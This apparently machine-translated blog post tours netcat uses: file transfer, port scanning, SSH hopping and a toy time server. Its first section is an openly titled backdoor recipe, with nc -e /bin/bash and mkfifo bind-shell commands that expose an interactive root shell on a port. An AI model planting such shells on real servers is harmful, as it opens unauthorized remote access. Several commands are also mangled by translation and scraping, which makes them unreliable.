Xjjdog (xjjdog) Any reprint that does not retain this statement is plagiarism.

For nc commands, it really takes a line of code to tune for a long time. Because the power of this line of code is very large! Of course, if it is not used properly, it will bring trouble to itself.

The netcat tool, nc for short, is a very powerful tool for Linux (there are Windows versions too, of course). As she was so powerful, some companies even quarantined her. For example, rename drops, or give 000 permissions. Because it is very easy to open a backdoor in the server, and extremely convenient.

Where is the NC order? Where is it?

# whereis nc
nc: /usr/bin/nc /usr/share/man/man1/nc.1.gz
Copy the code

It tells me that the file is in /usr/bin. Let’s look at its properties using the file command. It turns out to be a link file.

# file /usr/bin/nc
/usr/bin/nc: symbolic link to `ncat'
Copy the code

Ncat: Concatenate and Redirect Sockets. This is a Swiss Army knife.

Nc parameters are very, very many, if listed, you will lose interest, miss such a powerful tool, but also missed the opportunity to get into the bureau. As an example, this command, which is less than 1MB, captured XjjDog’s heart.

1. Install a rear door on the server

The following command will open port 5879 on the machine. Server:

# nc -l -vv -p 5879 -e /bin/bashNcat: Version 6.40 (http://nmap.org/ncat) Ncat: Listening on ::5879 Ncat: Listening on 0.0.0.0:5879Copy the code

This process is called bouncing shell and can be connected remotely using nc commands to do something.

Client:

# nC-v 192.16.1.54 5879Connection to 192.16.1.54 port 5879 [TCP /*] Succeeded!Copy the code

At this point, any shell command can be executed normally. The following GIF demonstrates this process.

Want something a little more bossy? We need to use the mkFIFo command.

On the server, execute the following two commands, which construct a loop.

rm -f /tmp/f; mkfifo /tmp/f
cat /tmp/f | /bin/bash -i 2>&1 | nc -l  5879 > /tmp/f
Copy the code

After the client nc connection, the command line operation terminal appeared directly!

$ nc -v 192.16.1.54 5879
Connection to 192.16.1.54 port 5879 [tcp/*] succeeded!
[root@localhost~]#
Copy the code

You might say, well, when I shut down the client, why did the server command quit? If you want the server to continue listening, add the -k parameter.

2. File and directory transfer

Still using SFTP? Or RZSZ?

These tools, while useful, need to be installed. Sometimes things are urgent, or the authority of the strict, there is no such tool.

At this point, NC can help.

The server also listens on a port, but this time redirects to a file.

nc -l 5879 > file
Copy the code

The client can then launch a command to send the file. This time I’m going to use the reverse arrow.

Nc-v 192.16.1.54 5879 < redis-5.0.5.tar.gzCopy the code

Files are moving fast! And it’s faster because there’s no RSA encryption.

If you look at their MD5, they’re exactly the same.

The MD5 (redis - 5.0.5. Tar. Gz) = 224 cabf26d622f37528b398762e1578c md5sum file 224 cabf26d622f37528b398762e1578c fileCopy the code

I know you’ve got a catalog in your head right now. It’s an interesting process.

We pipe the output of NC to tar. XFVZ and CVFZ are a pair of arguments, so you can guess what to do.

nc -l 5879  | tar xfvz -
Copy the code

That’s right, the client code is the opposite of the one above. This time, however, our NC command accepts the packaged files.

The tar CFZ - redis - 5.0.5 | nc 192.16.1.54 5879 - vCopy the code

It’s really clever.

3. Check the network connectivity

Yes, this is where the NC command is most commonly used.

If you want to check whether the tomcat port on the server is enabled, you do not need to log in to the server and then photoshop to see the process, or use netstat-antl to see which port to listen on.

Use NC.

Simply type in the IP and port and it will know the result.

# nc -vvv baidu.com 443
Connection to baidu.com port 443 [tcp/https] succeeded!
Copy the code

Of course, it can also scan the host for port openings. But not much for programmers.

Nc-vzw 2 192.16.1.54 8888-9999Copy the code

4. The firewall penetrates

Take the picture below. You want access to this machine at Tongariro, but you don’t have access. It can only be accessed through Aoraki’s firewall. Aoraki, meanwhile, can only accept requests from Ruapehu.

You can achieve this effect by combining SSH commands.

ssh -A -t ruapehu.example.com ssh -A -t aoraki ssh -A tongariro
Copy the code

Using SSH ProxyCommand, you can complete simple configuration.

Use the following command to quickly open this channel.

ssh -oProxyCommand="ssh host1 nc host2 22" host2
Copy the code

5. Other

You can see it. These capabilities of nc are not provided by NC itself, but by additional commands.

For example, here we implement a simple time server. You can access it using a web browser.

ncat -lkp 8976 --sh-exec 'echo -ne "HTTP/1.0 200 OK\r\n\r\nThe date is "; date; '
Copy the code

For example, build a remote video service.

The service side.

arecord -f cd -c 2 | lame -b128 - - | netcat -u your-ip 6881 | mpg123 -
Copy the code

The client.

arecord -f cd -c 2 | lame -b128 - - | netcat -u -l 6881 | mpg123 -****
Copy the code

Little Sister Flavor (XjjDog), a GZH that doesn’t allow programmers to get sidetracked. Focus on infrastructure and Linux. Ten years architecture, ten billion daily flow, and you discuss the world of high concurrency, give you a different taste.